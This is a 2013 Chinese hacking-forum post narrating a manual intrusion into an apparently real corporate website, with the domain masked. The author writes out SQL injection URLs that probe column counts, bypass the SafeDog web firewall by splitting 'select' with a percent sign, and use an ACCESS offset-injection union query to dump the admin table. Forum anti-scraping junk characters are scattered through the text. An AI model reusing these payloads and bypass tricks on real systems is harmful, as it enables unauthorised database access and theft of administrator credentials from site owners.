找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2104|回复: 0
打印 上一主题 下一主题

一次手工渗透突破安全狗防御+ACCESS偏移注入

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-8 21:49:45 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
打开网站,一个企业站。% B. L, [4 i  R+ g& z4 h& l
% {. y" r% ^& B" J5 n
9 \4 @4 i9 o3 q* G
顺手加个admin9 Z" n' x: ^  s6 i

9 T  J4 Q/ ]1 J. ^' y1 G# I$ V1 x/ E: \9 D0 D
默认后台。
. k% h* w+ M+ K回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。​. O9 C9 c( Z/ O- X- h
4 p- v, g% R! @, B% X% p9 @
1 K" @. A8 M8 C. Z
" ?& J0 X6 L1 a1 |' A
所以就不用御剑扫了,待会直接封IP。
) S0 r) y- a. G9 }
" c9 e  y2 `' ^& m/ b用order by语句判断是否存在注入。0 g+ @/ d# T+ M/ W3 m& W8 i) V
http://www.xxx.com /product_show.asp?id=997 order by 1
! ?' F) I7 D- P. s+ j& M' N0 ]2 Vhttp://www.xxx.com /product_show.asp?id=997 order by 100
* M: v# B' i6 T6 V现在存在注入,经测试后发现是9个字段。
5 P+ Q7 j+ D. E
% r% U8 X7 |+ E6 }8 W2 V接下来进行联合查询,猜是否存在admin表。
& b0 l$ ?5 R4 O  ^' Chttp://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。​
5 ?) B+ G6 T+ _. z
  V6 y% c* y* H( Q/ K8 w" k: N7 n$ l
' M+ h" u7 d' B( ^
在select中间加个%,se%lect绕过安全狗。, q! x& N' t/ D6 l% n& J* F

( T6 w$ u  k) g4 B+ u# R3 z( l6 l) [& S
发现存在admin表,然后开始手工猜常用的字段。
+ e" V0 f8 x; J/ S6 C* Z: X纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。
( e/ L) i$ Y0 y+ a( w% _ . j; F) F' R4 Y& b1 K
突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。
6 ]# J& U$ R+ S' v+ | 3 f8 E1 F) T8 W4 x# A3 ~
科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。. H1 W; n. W9 ?3 v1 C7 P" V
http://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin
( B/ Y$ B% {8 k5 t8 b好了,敏感内容出显了。​8 [7 g: _) Y" R* O' e# A% G$ h# i
3 H2 {# I$ I1 X9 C4 Q4 t
5 f/ v8 h9 C# X# ~

6 P+ v/ B" K% t" U3 Z, T) z
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表